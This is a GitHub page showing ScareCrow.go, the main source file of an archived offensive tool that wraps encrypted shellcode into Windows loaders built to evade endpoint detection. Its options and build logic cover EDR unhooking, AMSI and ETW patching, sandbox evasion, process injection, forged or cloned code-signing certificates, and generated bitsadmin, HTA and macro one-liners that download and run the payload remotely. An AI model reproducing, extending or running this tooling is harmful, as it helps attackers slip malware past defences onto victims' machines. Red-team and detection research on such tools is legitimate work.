This repository has been archived by the owner on Aug 18, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 506
/
ScareCrow.go
252 lines (223 loc) · 12.7 KB
/
ScareCrow.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
package main
import (
"ScareCrow/Cryptor"
"ScareCrow/Loader"
"ScareCrow/Utils"
"ScareCrow/limelighter"
"bytes"
"flag"
"fmt"
"log"
"os"
"os/exec"
)
type FlagOptions struct {
outFile string
inputFile string
URL string
LoaderType string
CommandLoader string
domain string
password string
valid string
configfile string
ProcessInjection string
AMSI bool
ETW bool
Sha bool
console bool
refresher bool
sandbox bool
sleep bool
nosign bool
evasion string
path string
obfuscate bool
export string
clone string
KnownDLLs bool
encryptionmode string
exectype string
}
func options() *FlagOptions {
outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.")
inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.")
console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.")
LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
[*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.`)
URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)")
CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel, and Wscript Loaders).
[*] hta - Generates a blank hta file containing the loader along with an MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders).
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders).`)
domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ")
exectype := flag.String("Exec", "RtlCopy", `Set the template to execute the shellcode:
[*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall.
[*] ProcessInjection - Process Injection Mode.
[*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread.
[*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process`)
evasion := flag.String("Evasion", "Disk", `Sets the type of EDR unhooking technique:
[*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk.
[*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace.
[*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.`)
password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BufferScanner.")
ETW := flag.Bool("noetw", false, "Disables the ETW patching that prevents ETW events from being generated.")
ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).")
configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the default ones.")
valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainJoined calls.`)
sleep := flag.Bool("nosleep", false, `Disables the sleep delay before the loader unhooks and executes the shellcode.`)
nosign := flag.Bool("nosign", false, `Disables file signing, making -domain/-valid/-password parameters not required.`)
path := flag.String("outpath", "", "The path to put the final Payload/Loader once it's compiled.")
obfuscate := flag.Bool("obfu", false, `Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile`)
export := flag.String("export", "", "For DLL Loaders Only - Specify an Export function for a loader to have.")
encryptionmode := flag.String("encryptionmode", "ELZMA", `Sets the type of encryption to encrypt the shellcode:
[*] AES - Enables AES 256 encryption.
[*] ELZMA - Enables ELZMA encryption.
[*] RC4 - Enables RC4 encryption.`)
clone := flag.String("clone", "", "Path to the file containing the certificate you want to clone")
flag.Parse()
return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, evasion: *evasion, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, exectype: *exectype, ProcessInjection: *ProcessInjection, valid: *valid, sandbox: *sandbox, sleep: *sleep, path: *path, nosign: *nosign, obfuscate: *obfuscate, export: *export, encryptionmode: *encryptionmode, clone: *clone}
}
func execute(opt *FlagOptions, name string) string {
bin, _ := exec.LookPath("env")
var compiledname string
var cmd *exec.Cmd
if opt.configfile != "" {
oldname := name
cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"")
err := cmd.Run()
if err != nil {
fmt.Printf("error")
}
} else {
name = limelighter.FileProperties(name, opt.configfile)
}
if opt.LoaderType == "binary" {
if opt.obfuscate == true {
cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-literals", "-seed=random", "build", "-o", ""+name+".exe")
} else {
cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "go", "build", "-trimpath", "-ldflags=-w -s -buildid=", "-o", ""+name+".exe")
}
} else {
cwd, err := os.Getwd()
if err != nil {
fmt.Println(err)
}
if opt.obfuscate == true {
cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "-literals", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared")
} else {
cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared")
}
}
if opt.obfuscate == true {
fmt.Println("[*] Compiling Payload with the Garble's literal flag... this will take a while")
} else {
fmt.Println("[*] Compiling Payload")
}
var out bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &out
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
fmt.Printf("%s: %s\n", err, stderr.String())
}
if opt.LoaderType == "binary" {
compiledname = name + ".exe"
} else {
compiledname = name + ".dll"
}
fmt.Println("[+] Payload Compiled")
if opt.nosign == false {
limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
}
if opt.clone != "" {
limelighter.Cloner(compiledname, opt.clone)
}
return name
}
func main() {
fmt.Println(`
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
`)
Utils.Version()
opt := options()
if opt.inputFile == "" {
log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)")
}
if opt.CommandLoader != "" && opt.URL == "" {
log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
}
if opt.exectype != "RtlCopy" && opt.exectype != "NtQueueApcThreadEx" && opt.exectype != "ProcessInjection" && opt.exectype != "VirtualAlloc" {
log.Fatal("Error: Invalid execution type, please select one of the allowed types")
}
if opt.evasion != "Disk" && opt.evasion != "KnownDLL" && opt.evasion != "None" {
log.Fatal("Error: Invalid evasion method, please select one of the allowed")
}
if opt.encryptionmode != "AES" && opt.encryptionmode != "ELZMA" && opt.encryptionmode != "RC4" {
log.Fatal("Error: Invalid encrpytion type, please select one of the allowed encrpytion types")
}
if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" {
log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
}
if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" {
log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types")
}
if opt.CommandLoader == "hta" && opt.outFile == "" {
log.Fatal("Error: Please provide the a HTA filename to store the loader in")
}
if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command")
}
if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing")
}
if opt.outFile == "" && (opt.LoaderType == "wscript" || opt.LoaderType == "excel") {
log.Fatal("Error: -O is needed for these types of loaders")
}
if opt.LoaderType == "binary" && opt.refresher == true {
log.Fatal("Error: Can not use the unmodified option with a binary loader")
}
if opt.console == true && opt.LoaderType != "binary" {
log.Fatal("Error: Console mode is only for binary based payloads")
}
if opt.domain == "" && opt.password == "" && opt.valid == "" && opt.nosign == false {
log.Fatal("Error: Please provide a domain in order to generate a code signing certificate")
}
if opt.domain != "" && opt.password != "" && opt.valid != "" && opt.nosign == false {
log.Fatal("Error: Please choose either -domain or -valid with -password to generate a code signing certificate")
}
if opt.password == "" && opt.valid != "" {
log.Fatal("Error: Please provide a password for the valid code signing certificate")
}
if opt.ProcessInjection != "" && (opt.ETW == true || opt.AMSI == true) {
fmt.Println("[!] Currently ETW and AMSI patching only affects the parent process not the injected process")
}
if opt.ProcessInjection != "" && opt.refresher == true {
log.Fatal("Error: Can not use the unmodified option with the process injection loaders")
}
if opt.LoaderType != "dll" && opt.export != "" {
log.Fatal("Error: Export option can only be used with DLL loaders ")
}
Utils.CheckGarble()
b64ciphertext, b64key, b64iv := Cryptor.EncryptShellcode(opt.inputFile, opt.encryptionmode)
fmt.Println("[+] Shellcode Encrypted")
name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI, opt.export, opt.encryptionmode, opt.exectype, opt.evasion)
name = execute(opt, name)
Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.path)
}